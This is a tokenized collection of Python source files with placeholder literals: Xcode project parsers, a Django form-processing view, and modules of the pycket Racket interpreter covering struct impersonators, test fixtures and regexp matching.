<s> from __future__ import absolute_import <EOL> import os <EOL> import sys <EOL> from . xcspec import * <EOL> class XCSpecBuildPhase ( xcspec ) : <EOL> def __init__ ( self , spec_data ) : <EOL> super ( XCSpecBuildPhase , self ) . __init__ ( spec_data ) ; </s>
<s> from . PBXResolver import * <EOL> from . PBX_Base import * <EOL> class PBXBuildRule ( PBX_Base ) : <EOL> def __init__ ( self , lookup_func , dictionary , project , identifier ) : <EOL> super ( PBXBuildRule , self ) . __init__ ( lookup_func , dictionary , project , identifier ) ; <EOL> if '<STR_LIT>' in dictionary . keys ( ) : <EOL> self . compilerSpec = dictionary [ '<STR_LIT>' ] ; <EOL> if '<STR_LIT>' in dictionary . keys ( ) : <EOL> self . filePatterns = dictionary [ '<STR_LIT>' ] ; <EOL> if '<STR_LIT>' in dictionary . keys ( ) : <EOL> self . fileType = dictionary [ '<STR_LIT>' ] ; <EOL> if '<STR_LIT>' in dictionary . keys ( ) : <EOL> self . isEditable = dictionary [ '<STR_LIT>' ] ; <EOL> if '<STR_LIT>' in dictionary . keys ( ) : <EOL> self . outputFiles = dictionary [ '<STR_LIT>' ] ; <EOL> if '<STR_LIT>' in dictionary . keys ( ) : <EOL> self . script = dictionary [ '<STR_LIT>' ] ; </s>
<s> import os <EOL> from . PBX_Base_Reference import * <EOL> from ... Helpers import path_helper <EOL> class PBXZipArchiveReference ( PBX_Base_Reference ) : <EOL> def __init__ ( self , lookup_func , dictionary , project , identifier ) : <EOL> super ( PBXZipArchiveReference , self ) . __init__ ( lookup_func , dictionary , project , identifier ) ; </s>
<s> from Base_Action import Base_Action </s>
<s> import os . path <EOL> import unittest <EOL> def get_tests ( ) : <EOL> return full_suite ( ) <EOL> def full_suite ( ) : <EOL> from . resource import ResourceTestCase <EOL> from . serializer import ResourceTestCase as SerializerTestCase <EOL> from . utils import UtilsTestCase <EOL> resourcesuite = unittest . TestLoader ( ) . loadTestsFromTestCase ( ResourceTestCase ) <EOL> serializersuite = unittest . TestLoader ( ) . loadTestsFromTestCase ( SerializerTestCase ) <EOL> utilssuite = unittest . TestLoader ( ) . loadTestsFromTestCase ( UtilsTestCase ) <EOL> return unittest . TestSuite ( [ resourcesuite , serializersuite , utilssuite ] ) </s>
<s> from django . shortcuts import get_object_or_404 , render_to_response <EOL> from django . template import RequestContext <EOL> from django . utils . translation import ugettext as _ <EOL> from django . http import HttpResponseRedirect <EOL> from django . conf import settings <EOL> from form_designer import settings as app_settings <EOL> from django . contrib import messages <EOL> from django . core . context_processors import csrf <EOL> import os <EOL> import random <EOL> from datetime import datetime <EOL> from form_designer . forms import DesignedForm <EOL> from form_designer . models import FormDefinition , FormLog <EOL> from form_designer . uploads import handle_uploaded_files <EOL> from form_designer . signals import ( designedform_submit , designedform_success , <EOL> designedform_error , designedform_render ) <EOL> def process_form ( request , form_definition , extra_context = { } , disable_redirection = False ) : <EOL> context = extra_context <EOL> success_message = form_definition . success_message or _ ( '<STR_LIT>' ) <EOL> error_message = form_definition . error_message or _ ( '<STR_LIT>' ) <EOL> form_error = False <EOL> form_success = False <EOL> is_submit = False <EOL> if request . method == '<STR_LIT:POST>' and request . POST . get ( form_definition . submit_flag_name ) : <EOL> form = DesignedForm ( form_definition , None , request . POST , request . FILES ) <EOL> is_submit = True <EOL> if request . method == '<STR_LIT:GET>' and request . GET . get ( form_definition . submit_flag_name ) : <EOL> form = DesignedForm ( form_definition , None , request . GET ) <EOL> is_submit = True <EOL> if is_submit : <EOL> designedform_submit . send ( sender = process_form , context = context , <EOL> form_definition = form_definition , request = request ) <EOL> if form . is_valid ( ) : <EOL> files = handle_uploaded_files ( form_definition , form ) <EOL> messages . success ( request , success_message ) <EOL> form_success = True <EOL> designedform_success . 
send ( sender = process_form , context = context , <EOL> form_definition = form_definition , request = request ) <EOL> if form_definition . log_data : <EOL> form_definition . log ( form , request . user ) <EOL> if form_definition . mail_to : <EOL> form_definition . send_mail ( form , files ) <EOL> if form_definition . success_redirect and not disable_redirection : <EOL> return HttpResponseRedirect ( form_definition . action or '<STR_LIT:?>' ) <EOL> if form_definition . success_clear : <EOL> form = DesignedForm ( form_definition ) <EOL> else : <EOL> form_error = True <EOL> designedform_error . send ( sender = process_form , context = context , <EOL> form_definition = form_definition , request = request ) <EOL> messages . error ( request , error_message ) <EOL> else : <EOL> if form_definition . allow_get_initial : <EOL> form = DesignedForm ( form_definition , initial_data = request . GET ) <EOL> else : <EOL> form = DesignedForm ( form_definition ) <EOL> designedform_render . send ( sender = process_form , context = context , <EOL> form_definition = form_definition , request = request ) <EOL> context . update ( { <EOL> '<STR_LIT>' : form_error , <EOL> '<STR_LIT>' : form_success , <EOL> '<STR_LIT>' : form , <EOL> '<STR_LIT>' : form_definition <EOL> } ) <EOL> context . update ( csrf ( request ) ) <EOL> if form_definition . display_logged : <EOL> logs = form_definition . logs . all ( ) . order_by ( '<STR_LIT>' ) <EOL> context . update ( { '<STR_LIT>' : logs } ) <EOL> return context <EOL> def _form_detail_view ( request , form_definition ) : <EOL> result = process_form ( request , form_definition ) <EOL> if isinstance ( result , HttpResponseRedirect ) : <EOL> return result <EOL> result . update ( { <EOL> '<STR_LIT>' : form_definition . form_template_name or app_settings . 
DEFAULT_FORM_TEMPLATE <EOL> } ) <EOL> return render_to_response ( '<STR_LIT>' , result , <EOL> context_instance = RequestContext ( request ) ) <EOL> def detail ( request , object_name ) : <EOL> form_definition = get_object_or_404 ( FormDefinition , name = object_name , require_hash = False ) <EOL> return _form_detail_view ( request , form_definition ) <EOL> def detail_by_hash ( request , public_hash ) : <EOL> form_definition = get_object_or_404 ( FormDefinition , public_hash = public_hash ) <EOL> return _form_detail_view ( request , form_definition ) </s>
<s> from pycket import values , values_struct <EOL> from pycket . base import SingletonMeta , W_Object <EOL> from pycket . cont import call_cont , continuation , guarded_loop , label <EOL> from pycket . impersonators import ( <EOL> ChaperoneMixin , <EOL> ImpersonatorMixin , <EOL> ProxyMixin , <EOL> W_ImpPropertyDescriptor , <EOL> chaperone_reference_cont , <EOL> check_chaperone_results , <EOL> get_base_object , <EOL> make_property_map , <EOL> impersonate_reference_cont <EOL> ) <EOL> from pycket . hidden_classes import make_caching_map_type , make_map_type , make_composite_map_type <EOL> from pycket . small_list import inline_small_list <EOL> from rpython . rlib import jit , unroll <EOL> from rpython . rlib . objectmodel import import_from_mixin , specialize , always_inline <EOL> def is_static_handler ( func ) : <EOL> return isinstance ( func , values . W_Prim ) or isinstance ( func , values . W_PromotableClosure ) <EOL> def enter_above_depth ( n ) : <EOL> @ jit . unroll_safe <EOL> def above_threshold ( self , field , * args ) : <EOL> if jit . we_are_jitted ( ) : <EOL> return True <EOL> for _ in range ( n ) : <EOL> if not isinstance ( self , W_InterposeStructBase ) : <EOL> return False <EOL> self = self . 
inner <EOL> return True <EOL> return above_threshold <EOL> HANDLER_ACCESSOR_TAG = <NUM_LIT> <EOL> HANDLER_MUTATOR_TAG = <NUM_LIT> <EOL> OVERRIDE_ACCESSOR_TAG = <NUM_LIT> <EOL> OVERRIDE_MUTATOR_TAG = <NUM_LIT> <EOL> TAG_BITS = <NUM_LIT:2> <EOL> def tag_handler_accessor ( idx ) : <EOL> assert idx >= <NUM_LIT:0> <EOL> return ( idx << TAG_BITS ) | HANDLER_ACCESSOR_TAG <EOL> def tag_handler_mutator ( idx ) : <EOL> assert idx >= <NUM_LIT:0> <EOL> return ( idx << TAG_BITS ) | HANDLER_MUTATOR_TAG <EOL> def tag_override_accessor ( idx ) : <EOL> assert idx >= <NUM_LIT:0> <EOL> return ( idx << TAG_BITS ) | OVERRIDE_ACCESSOR_TAG <EOL> def tag_override_mutator ( idx ) : <EOL> assert idx >= <NUM_LIT:0> <EOL> return ( idx << TAG_BITS ) | OVERRIDE_MUTATOR_TAG <EOL> def is_accessor ( key ) : <EOL> return key >= <NUM_LIT:0> and ( key & <NUM_LIT> ) == <NUM_LIT:0> <EOL> def is_mutator ( key ) : <EOL> return key >= <NUM_LIT:0> and ( key & <NUM_LIT> ) == <NUM_LIT:1> <EOL> def is_handler ( key ) : <EOL> return key >= <NUM_LIT:0> and ( key & <NUM_LIT> ) == <NUM_LIT:0> <EOL> def is_override ( key ) : <EOL> return key >= <NUM_LIT:0> and ( key & <NUM_LIT> ) == <NUM_LIT:1> <EOL> def add_handler_field ( map , handler_array , name , val ) : <EOL> if is_static_handler ( val ) : <EOL> new_map = map . add_static_attribute ( name , val ) <EOL> else : <EOL> if handler_array is None : <EOL> handler_array = [ ] <EOL> new_map = map . add_dynamic_attribute ( name ) <EOL> handler_array . append ( val ) <EOL> return handler_array , new_map <EOL> class Pair ( W_Object ) : <EOL> _attrs_ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> _immutable_fields_ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , fst , snd ) : <EOL> self . fst = fst <EOL> self . snd = snd <EOL> def __iter__ ( self ) : <EOL> yield self . fst <EOL> yield self . snd <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:2> <EOL> def __getitem__ ( self , idx ) : <EOL> if idx == <NUM_LIT:0> : <EOL> return self . 
fst <EOL> if idx == <NUM_LIT:1> : <EOL> return self . snd <EOL> raise IndexError ( "<STR_LIT>" % idx ) <EOL> NONE_PAIR = Pair ( None , None ) <EOL> CompositeMap = make_composite_map_type ( shared_storage = True ) <EOL> @ jit . unroll_safe <EOL> def impersonator_args ( struct , overrides , handlers , prop_keys , prop_vals ) : <EOL> from pycket . prims . struct_structinfo import struct_info <EOL> assert len ( overrides ) == len ( handlers ) <EOL> _handlers = None <EOL> struct_props = None <EOL> struct_prop_keys = None <EOL> struct_prop_vals = None <EOL> handler_map = W_InterposeStructBase . EMPTY_HANDLER_MAP <EOL> struct_type = jit . promote ( struct . struct_type ( ) ) <EOL> for i , op in enumerate ( overrides ) : <EOL> base = get_base_object ( op ) <EOL> if isinstance ( base , values_struct . W_StructFieldAccessor ) : <EOL> if handlers [ i ] is not values . w_false : <EOL> field = base . get_absolute_index ( struct_type ) <EOL> idx = tag_handler_accessor ( field ) <EOL> _handlers , handler_map = add_handler_field ( handler_map , _handlers , idx , handlers [ i ] ) <EOL> if type ( op ) is not values_struct . W_StructFieldAccessor : <EOL> field = base . get_absolute_index ( struct_type ) <EOL> idx = tag_override_accessor ( field ) <EOL> _handlers , handler_map = add_handler_field ( handler_map , _handlers , idx , op ) <EOL> elif isinstance ( base , values_struct . W_StructFieldMutator ) : <EOL> if handlers [ i ] is not values . w_false : <EOL> field = base . get_absolute_index ( struct_type ) <EOL> idx = tag_handler_mutator ( field ) <EOL> _handlers , handler_map = add_handler_field ( handler_map , _handlers , idx , handlers [ i ] ) <EOL> if type ( op ) is not values_struct . W_StructFieldAccessor : <EOL> field = base . get_absolute_index ( struct_type ) <EOL> idx = tag_override_mutator ( field ) <EOL> _handlers , handler_map = add_handler_field ( handler_map , _handlers , idx , op ) <EOL> elif base is struct_info and handlers [ i ] is not values . 
w_false : <EOL> idx = INFO_HANDLER_IDX <EOL> _handlers , handler_map = add_handler_field ( handler_map , _handlers , idx , handlers [ i ] ) <EOL> elif isinstance ( base , values_struct . W_StructPropertyAccessor ) : <EOL> if struct_prop_keys is None : <EOL> struct_prop_keys = [ ] <EOL> struct_prop_vals = [ ] <EOL> struct_prop_keys . append ( base ) <EOL> struct_prop_vals . append ( Pair ( op , handlers [ i ] ) ) <EOL> else : <EOL> assert False <EOL> EMPTY = W_InterposeStructBase . EMPTY_PROPERTY_MAP <EOL> property_map = make_property_map ( struct_prop_keys , make_property_map ( prop_keys , EMPTY ) ) <EOL> vals = concat ( _handlers , concat ( prop_vals , struct_prop_vals ) ) <EOL> storage = vals [ : ] if vals is not None else None <EOL> map = CompositeMap . instantiate ( handler_map , property_map ) <EOL> return map , storage <EOL> def concat ( l1 , l2 ) : <EOL> """<STR_LIT>""" <EOL> if l1 is None : <EOL> return l2 <EOL> if l2 is None : <EOL> return l1 <EOL> return l1 + l2 <EOL> @ jit . elidable <EOL> def has_accessor ( map ) : <EOL> for tag in map . iterkeys ( ) : <EOL> if is_handler ( tag ) and is_accessor ( tag ) : <EOL> return True <EOL> return False <EOL> @ jit . elidable <EOL> def has_property_descriptor ( map ) : <EOL> for key in map . iterkeys ( ) : <EOL> if type ( key ) is W_ImpPropertyDescriptor : <EOL> return True <EOL> return False <EOL> @ specialize . arg ( <NUM_LIT:0> ) <EOL> def make_struct_proxy ( cls , inner , overrides , handlers , prop_keys , prop_vals ) : <EOL> assert isinstance ( inner , values_struct . W_RootStruct ) <EOL> assert not prop_keys and not prop_vals or len ( prop_keys ) == len ( prop_vals ) <EOL> map , _handlers = impersonator_args ( inner , overrides , handlers , prop_keys , prop_vals ) <EOL> return cls . make ( _handlers , inner , map ) <EOL> INFO_HANDLER_IDX = - <NUM_LIT:1> <EOL> INFO_OVERRIDE_IDX = - <NUM_LIT:2> <EOL> class W_InterposeStructBase ( values_struct . 
W_RootStruct ) : <EOL> EMPTY_HANDLER_MAP = make_caching_map_type ( "<STR_LIT>" ) . EMPTY <EOL> EMPTY_PROPERTY_MAP = make_map_type ( "<STR_LIT>" ) . EMPTY <EOL> _attrs_ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> _immutable_fields_ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , inner , map ) : <EOL> self . inner = inner <EOL> self . map = map <EOL> if isinstance ( inner , W_InterposeStructBase ) and map is inner . map : <EOL> self . base = inner . base <EOL> else : <EOL> self . base = inner <EOL> def get_storage_index ( self , idx ) : <EOL> return self . _get_list ( idx ) <EOL> def get_proxied ( self ) : <EOL> return self . inner <EOL> def get_base ( self ) : <EOL> return self . base <EOL> def is_proxy ( self ) : <EOL> return True <EOL> def get_property ( self , prop , default = None ) : <EOL> return self . map . lookup_property ( prop , self , default = default ) <EOL> def immutable ( self ) : <EOL> return get_base_object ( self . base ) . immutable ( ) <EOL> def tostring ( self ) : <EOL> return get_base_object ( self . base ) . tostring ( ) <EOL> def post_ref_cont ( self , interp , app , env , cont ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def post_set_cont ( self , op , field , val , app , env , cont ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def is_non_interposing_chaperone ( self ) : <EOL> map = jit . promote ( self . map ) <EOL> return ( not has_accessor ( map . handlers ) and <EOL> has_property_descriptor ( map . properties ) ) <EOL> def struct_type ( self ) : <EOL> return get_base_object ( self . base ) . struct_type ( ) <EOL> def get_handler_accessor ( self , field ) : <EOL> idx = tag_handler_accessor ( field ) <EOL> return self . map . lookup_handler ( idx , self ) <EOL> def get_override_accessor ( self , field ) : <EOL> idx = tag_override_accessor ( field ) <EOL> return self . map . 
lookup_handler ( idx , self ) <EOL> def get_handler_mutator ( self , field ) : <EOL> idx = tag_handler_mutator ( field ) <EOL> return self . map . lookup_handler ( idx , self ) <EOL> def get_override_mutator ( self , field ) : <EOL> idx = tag_override_mutator ( field ) <EOL> return self . map . lookup_handler ( idx , self ) <EOL> @ guarded_loop ( enter_above_depth ( <NUM_LIT:5> ) , always_use_labels = False ) <EOL> def ref_with_extra_info ( self , field , app , env , cont ) : <EOL> handler = self . get_handler_accessor ( field ) <EOL> override = self . get_override_accessor ( field ) <EOL> if handler is None and override is None : <EOL> return self . base . ref_with_extra_info ( field , app , env , cont ) <EOL> if handler is not None : <EOL> cont = self . post_ref_cont ( handler , app , env , cont ) <EOL> if override is not None : <EOL> return override . call_with_extra_info ( [ self . inner ] , env , cont , app ) <EOL> return self . inner . ref_with_extra_info ( field , app , env , cont ) <EOL> @ guarded_loop ( enter_above_depth ( <NUM_LIT:5> ) , always_use_labels = False ) <EOL> def set_with_extra_info ( self , field , val , app , env , cont ) : <EOL> handler = self . get_handler_mutator ( field ) <EOL> override = self . get_override_mutator ( field ) <EOL> if handler is None and override is None : <EOL> return self . base . set_with_extra_info ( field , val , app , env , cont ) <EOL> if handler is None : <EOL> return self . inner . set_with_extra_info ( field , val , app , env , cont ) <EOL> after = self . post_set_cont ( override , field , val , app , env , cont ) <EOL> return handler . call_with_extra_info ( [ self , val ] , env , after , app ) <EOL> def get_prop ( self , property , env , cont ) : <EOL> pair = self . get_property ( property , default = NONE_PAIR ) <EOL> assert type ( pair ) is Pair <EOL> op , interp = pair <EOL> if op is None or interp is None : <EOL> return self . inner . get_prop ( property , env , cont ) <EOL> after = self . 
post_ref_cont ( interp , None , env , cont ) <EOL> return op . call ( [ self . inner ] , env , after ) <EOL> @ guarded_loop ( enter_above_depth ( <NUM_LIT:5> ) , always_use_labels = False ) <EOL> def get_struct_info ( self , env , cont ) : <EOL> handler = self . map . lookup_handler ( INFO_HANDLER_IDX , self ) <EOL> if handler is not None : <EOL> cont = call_cont ( handler , env , cont ) <EOL> return self . inner . get_struct_info ( env , cont ) <EOL> def get_arity ( self ) : <EOL> return get_base_object ( self . base ) . get_arity ( ) <EOL> def vals ( self ) : <EOL> base = get_base_object ( self . base ) <EOL> assert isinstance ( base , values_struct . W_RootStruct ) <EOL> return base . vals ( ) <EOL> @ inline_small_list ( immutable = True , unbox_num = True ) <EOL> class W_ImpStruct ( W_InterposeStructBase ) : <EOL> import_from_mixin ( ImpersonatorMixin ) <EOL> def post_ref_cont ( self , interp , app , env , cont ) : <EOL> return impersonate_reference_cont ( interp , [ self ] , app , env , cont ) <EOL> def post_set_cont ( self , op , field , val , app , env , cont ) : <EOL> return imp_struct_set_cont ( self . inner , op , field , app , env , cont ) <EOL> @ inline_small_list ( immutable = True , unbox_num = True ) <EOL> class W_ChpStruct ( W_InterposeStructBase ) : <EOL> import_from_mixin ( ChaperoneMixin ) <EOL> def post_ref_cont ( self , interp , app , env , cont ) : <EOL> args = values . Values . make1 ( self ) <EOL> return chaperone_reference_cont ( interp , args , app , env , cont ) <EOL> def post_set_cont ( self , op , field , val , app , env , cont ) : <EOL> val = values . Values . make1 ( val ) <EOL> return check_chaperone_results ( val , env , <EOL> imp_struct_set_cont ( self . inner , op , field , app , env , cont ) ) <EOL> class W_InterposeStructStack ( values_struct . 
W_RootStruct ) : <EOL> import_from_mixin ( ProxyMixin ) <EOL> _immutable_fields_ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , inner , handlers , handler_map ) : <EOL> self . handlers = handlers <EOL> self . handler_map = handler_map <EOL> self . init_proxy ( inner , prop_keys , prop_vals ) <EOL> def is_non_interposing_chaperone ( self ) : <EOL> return ( not has_accessor ( self . handler_map ) and <EOL> has_property_descriptor ( self . property_map ) ) <EOL> def post_ref_cont ( self , interp , app , env , cont ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def post_set_cont ( self , op , field , val , app , env , cont ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def ref_with_extra_info ( self , field , app , env , cont ) : <EOL> pass <EOL> def set_with_extra_info ( self , field , val , app , env , cont ) : <EOL> pass <EOL> def get_prop ( self , property , env , cont ) : <EOL> pair = self . get_property ( property , NONE_PAIR ) <EOL> assert type ( pair ) is Pair <EOL> op , interp = pair <EOL> if op is None or interp is None : <EOL> return self . inner . get_prop ( property , env , cont ) <EOL> after = self . post_ref_cont ( interp , None , env , cont ) <EOL> return op . call ( [ self . inner ] , env , after ) <EOL> @ guarded_loop ( enter_above_depth ( <NUM_LIT:5> ) , always_use_labels = False ) <EOL> def get_struct_info ( self , env , cont ) : <EOL> handler = self . handler_map . lookup ( INFO_HANDLER_IDX , self . handlers ) <EOL> if handler is not None : <EOL> cont = call_cont ( handler , env , cont ) <EOL> return self . inner . get_struct_info ( env , cont ) <EOL> def get_arity ( self ) : <EOL> return get_base_object ( self . base ) . get_arity ( ) <EOL> def vals ( self ) : <EOL> return self . inner . vals ( ) <EOL> def valid_struct_proc ( x ) : <EOL> v = get_base_object ( x ) <EOL> return ( isinstance ( v , values_struct . W_StructFieldAccessor ) or <EOL> isinstance ( v , values_struct . 
W_StructFieldMutator ) or <EOL> isinstance ( v , values_struct . W_StructPropertyAccessor ) ) <EOL> @ continuation <EOL> def imp_struct_set_cont ( orig_struct , setter , field , app , env , cont , _vals ) : <EOL> from pycket . interpreter import check_one_val <EOL> val = check_one_val ( _vals ) <EOL> if setter is values . w_false : <EOL> return orig_struct . set_with_extra_info ( field , val , app , env , cont ) <EOL> return setter . call_with_extra_info ( [ orig_struct , val ] , env , cont , app ) </s>
<s> import pycket . config <EOL> import pytest <EOL> def pytest_addoption ( parser ) : <EOL> parser . addoption ( '<STR_LIT>' , action = '<STR_LIT:store>' , default = "<STR_LIT>" , help = '<STR_LIT>' ) <EOL> def pytest_configure ( config ) : <EOL> byte_flag = config . getvalue ( '<STR_LIT>' ) <EOL> if byte_flag == "<STR_LIT>" : <EOL> print "<STR_LIT>" <EOL> config . byte_option = False <EOL> elif byte_flag == "<STR_LIT>" : <EOL> print "<STR_LIT>" <EOL> config . byte_option = True <EOL> def pytest_funcarg__racket_file ( request ) : <EOL> tmpdir = request . getfuncargvalue ( '<STR_LIT>' ) <EOL> name = '<STR_LIT>' <EOL> assert request . function . __doc__ is not None <EOL> file_name = tmpdir / name <EOL> file_name . write ( request . function . __doc__ ) <EOL> return str ( file_name ) <EOL> def pytest_funcarg__empty_json ( request ) : <EOL> def make_filename ( ) : <EOL> import inspect , py <EOL> module_file = inspect . getmodule ( request . function ) . __file__ <EOL> return str ( py . path . local ( module_file ) . dirpath ( "<STR_LIT>" ) ) <EOL> return request . cached_setup ( setup = make_filename , scope = "<STR_LIT>" ) <EOL> def pytest_funcarg__source ( request ) : <EOL> assert request . function . __doc__ is not None <EOL> code = request . function . __doc__ <EOL> return code <EOL> def pytest_funcarg__doctest ( request ) : <EOL> from textwrap import dedent <EOL> from pycket . test . testhelper import check_equal , execute <EOL> from pycket . error import SchemeException <EOL> assert request . function . __doc__ is not None <EOL> code = dedent ( request . function . __doc__ ) <EOL> lines = [ lin for lin in code . splitlines ( ) if lin ] <EOL> setup = [ ] <EOL> exprs = [ ] <EOL> expect = [ ] <EOL> errors = [ ] <EOL> current_let = [ ] <EOL> setup_done = False <EOL> for line in lines : <EOL> if line [ <NUM_LIT:0> ] == "<STR_LIT:;>" : <EOL> continue <EOL> if not line . 
strip ( ) : <EOL> continue <EOL> elif line [ <NUM_LIT:0> ] == "<STR_LIT:!>" : <EOL> if setup_done : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> setup . append ( line [ <NUM_LIT:2> : ] ) <EOL> elif line [ <NUM_LIT:0> ] == "<STR_LIT:>>" : <EOL> setup_done = True <EOL> current_let . append ( line [ <NUM_LIT:2> : ] ) <EOL> elif line [ <NUM_LIT:0> ] == "<STR_LIT:E>" : <EOL> errors . append ( line [ <NUM_LIT:1> : ] ) <EOL> elif line [ <NUM_LIT:0> ] in "<STR_LIT>" : <EOL> current_let [ - <NUM_LIT:1> ] += "<STR_LIT:\n>" + line [ <NUM_LIT:2> : ] <EOL> else : <EOL> exprs . append ( current_let [ <NUM_LIT:0> ] if len ( current_let ) == <NUM_LIT:1> else current_let ) <EOL> current_let = [ ] <EOL> expect . append ( line ) <EOL> pairs = [ ] <EOL> for pair in zip ( exprs , expect ) : <EOL> pairs . extend ( pair ) <EOL> check_equal ( * pairs , extra = "<STR_LIT:\n>" . join ( setup ) ) <EOL> for error in errors : <EOL> with pytest . raises ( SchemeException ) : <EOL> execute ( error , extra = "<STR_LIT:\n>" . join ( setup ) ) <EOL> return True </s>
<s> from pycket . base import W_Object <EOL> from pycket . error import SchemeException <EOL> from pycket import values , values_string <EOL> from pycket import regexp <EOL> from rpython . rlib . rsre import rsre_core , rsre_char , rsre_re <EOL> from rpython . rlib import buffer , jit , rstring <EOL> from rpython . rlib . objectmodel import specialize <EOL> import sys <EOL> CACHE = regexp . RegexpCache ( ) <EOL> class PortBuffer ( buffer . Buffer ) : <EOL> """<STR_LIT>""" <EOL> _immutable_ = True <EOL> def __init__ ( self , w_port ) : <EOL> self . w_port = w_port <EOL> l = w_port . _length_up_to_end ( ) <EOL> assert l >= <NUM_LIT:0> <EOL> self . length = l <EOL> self . read_so_far = [ ] <EOL> def getlength ( self ) : <EOL> return self . length <EOL> def getitem ( self , index ) : <EOL> if index >= len ( self . read_so_far ) : <EOL> nchars = len ( self . read_so_far ) - index + <NUM_LIT:1> <EOL> self . read_so_far . extend ( list ( self . w_port . read ( nchars ) ) ) <EOL> ch = self . read_so_far [ index ] <EOL> return ch <EOL> class W_AnyRegexp ( W_Object ) : <EOL> _immutable_fields_ = [ "<STR_LIT:source>" ] <EOL> errorname = "<STR_LIT>" <EOL> def __init__ ( self , source ) : <EOL> self . source = source <EOL> self . code = None <EOL> def ensure_compiled ( self ) : <EOL> if self . code is None : <EOL> code , flags , groupcount , groupindex , indexgroup , group_offsets = regexp . compile ( CACHE , self . source , <NUM_LIT:0> ) <EOL> self . code = code <EOL> self . flags = flags <EOL> self . groupcount = groupcount <EOL> self . groupindex = groupindex <EOL> self . indexgroup = indexgroup <EOL> self . group_offsets = group_offsets <EOL> @ specialize . argtype ( <NUM_LIT:1> ) <EOL> def make_ctx ( self , s , start , end ) : <EOL> self . ensure_compiled ( ) <EOL> start , end = rsre_core . _adjust ( start , end , len ( s ) ) <EOL> if isinstance ( s , unicode ) : <EOL> return rsre_core . UnicodeMatchContext ( self . code , s , start , end , self . 
flags ) <EOL> return rsre_core . StrMatchContext ( self . code , s , start , end , self . flags ) <EOL> @ specialize . argtype ( <NUM_LIT:1> ) <EOL> def match_string ( self , s , start = <NUM_LIT:0> , end = sys . maxint ) : <EOL> ctx = self . make_ctx ( s , start , end ) <EOL> if not rsre_core . search_context ( ctx ) : <EOL> return None <EOL> return _extract_result ( ctx , self . groupcount ) <EOL> @ specialize . call_location ( ) <EOL> def _match_all_strings ( self , extract , s , start , end ) : <EOL> ctx = self . make_ctx ( s , start , end ) <EOL> matchlist = [ ] <EOL> while ctx . match_start <= ctx . end : <EOL> if not rsre_core . search_context ( ctx ) : <EOL> break <EOL> match = extract ( ctx , self . groupcount ) <EOL> matchlist . append ( match ) <EOL> no_progress = ( ctx . match_start == ctx . match_end ) <EOL> ctx . reset ( ctx . match_end + no_progress ) <EOL> return matchlist <EOL> @ specialize . argtype ( <NUM_LIT:1> ) <EOL> def match_all_strings ( self , s , start = <NUM_LIT:0> , end = sys . maxint ) : <EOL> return self . _match_all_strings ( _extract_result , s , start , end ) <EOL> @ specialize . argtype ( <NUM_LIT:1> ) <EOL> def match_all_string_positions ( self , s , start = <NUM_LIT:0> , end = sys . maxint ) : <EOL> return self . _match_all_strings ( _extract_spans , s , start , end ) <EOL> @ specialize . argtype ( <NUM_LIT:1> ) <EOL> def match_string_positions ( self , s , start = <NUM_LIT:0> , end = sys . maxint ) : <EOL> ctx = self . make_ctx ( s , start , end ) <EOL> if not rsre_core . search_context ( ctx ) : <EOL> return None <EOL> return _extract_spans ( ctx , self . groupcount ) <EOL> def match_port_positions ( self , w_port ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> def match_port ( self , w_port , start = <NUM_LIT:0> , end = sys . maxint ) : <EOL> self . ensure_compiled ( ) <EOL> if isinstance ( w_port , values . W_StringInputPort ) : <EOL> ctx = rsre_core . search ( self . code , w_port . str , start = w_port . 
ptr ) <EOL> if not ctx : <EOL> return None <EOL> start , end = ctx . span ( <NUM_LIT:0> ) <EOL> w_port . ptr = end <EOL> return _extract_result ( ctx , self . groupcount ) <EOL> buf = PortBuffer ( w_port ) <EOL> end = min ( end , buf . getlength ( ) ) <EOL> ctx = rsre_core . BufMatchContext ( self . code , buf , <NUM_LIT:0> , end , <NUM_LIT:0> ) <EOL> matched = rsre_core . search_context ( ctx ) <EOL> if not matched : <EOL> return None <EOL> return _extract_result ( ctx , self . groupcount ) <EOL> def equal ( self , other ) : <EOL> if not isinstance ( other , W_AnyRegexp ) : <EOL> return False <EOL> if type ( self ) is type ( other ) : <EOL> return self . source == other . source <EOL> return False <EOL> def tostring ( self ) : <EOL> return '<STR_LIT>' % self . source <EOL> @ rsre_core . specializectx <EOL> @ jit . unroll_safe <EOL> def _extract_spans ( ctx , groupcount ) : <EOL> return [ ctx . span ( i ) for i in range ( groupcount + <NUM_LIT:1> ) ] <EOL> @ rsre_core . specializectx <EOL> @ jit . unroll_safe <EOL> def _extract_result ( ctx , groupcount ) : <EOL> result = [ ] <EOL> for i in range ( groupcount + <NUM_LIT:1> ) : <EOL> start , end = ctx . span ( i ) <EOL> if start == - <NUM_LIT:1> and end == - <NUM_LIT:1> : <EOL> result . append ( None ) <EOL> else : <EOL> assert <NUM_LIT:0> <= start <EOL> assert <NUM_LIT:0> <= end <EOL> result . append ( _getslice ( ctx , start , end ) ) <EOL> return result <EOL> @ rsre_core . specializectx <EOL> def _getslice ( ctx , start , end ) : <EOL> if isinstance ( ctx , rsre_core . StrMatchContext ) : <EOL> return ctx . _string [ start : end ] <EOL> elif isinstance ( ctx , rsre_core . UnicodeMatchContext ) : <EOL> return ctx . _unicodestr [ start : end ] <EOL> else : <EOL> return '<STR_LIT>' . join ( [ chr ( ctx . 
